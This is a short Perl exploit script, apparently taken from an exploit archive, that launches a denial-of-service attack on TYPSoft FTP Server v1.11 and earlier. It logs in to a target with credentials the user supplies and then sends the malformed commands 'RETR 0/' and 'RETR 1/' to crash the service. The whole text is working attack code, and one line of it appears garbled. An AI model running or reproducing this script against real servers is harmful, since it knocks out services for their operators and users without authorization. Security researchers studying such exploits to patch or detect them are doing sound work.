#!/usr/bin/perl use IO::Socket; use Socket; print "\n-= TYPSoft FTP Server <= v1.11 DOS =-\n"; print "-= wood (at) Exploitlabs.com =-\n\n"; if($#ARGV < 2 | $#ARGV > 3) { die "usage: perl typsoft-1.11-DOS.pl [port]\n" }; if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" }; $adr = $ARGV[0]; $usr = $ARGV[1]; $pas = $ARGV[2]; $err1 = "RETR 0"; $err2 = "RETR 1"; $remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr, PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n"; $remote->autoflush(1); print $remote "USER $usr\n" and print "1. Sending : USER $usr...\n" or die "Error: cant send user\n"; print $remote "PASS $pas\n" and print "2. Sending : PASS $pas...\n" or die "Error: cant send pass\n"; print $remote "$err1/\n" and print "3. Sending : ErrorCode 1...\n"; print $remote "$err2/\n" and print "4. Sending : ErrorCode 2...\n\n"or die "Error: cant send error code\n"; print "Attack done. press any key to exit\n"; $bla= ; close $remote;